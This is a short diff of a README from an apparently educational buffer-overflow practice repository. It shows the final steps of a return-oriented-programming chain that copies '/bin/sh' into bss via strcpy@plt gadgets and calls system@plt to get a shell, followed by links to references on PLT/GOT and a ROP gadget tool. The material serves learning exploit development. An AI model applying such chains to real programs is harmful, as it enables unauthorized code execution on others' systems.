VagelisD/Buffer-Overflow-Practise/return-oriented-programming/README.md

 strcpy@plt + pop_pop_ret_gadget  + (bss + 4) + "/"
 strcpy@plt + pop_pop_ret_gadget  + (bss + 5) + "s"
 strcpy@plt + pop_pop_ret_gadget  + (bss + 6) + "h"
-system@plt + AAAA (ret_addr) + bss # AAAA as a ret_addr because we don't actually care where system is going to return to when is finished and we are using the initial address of bss because now contains the whole string "/bin/sh"
+system@plt + AAAA (ret_addr) + bss
 ```
+If you noticed i put "AAAA" (4-bytes) as a ret_addr because we don't actually care where system is going to return to when is finished and we are using the initial address of bss because now contains the whole string "/bin/sh".

 That's it.

 ## References

 [How plt and got works](https://www.technovelty.org/linux/plt-and-got-the-key-to-code-sharing-and-dynamic-libraries.html)

 [ROPgadget tool](https://github.com/JonathanSalwan/ROPgadget)
-[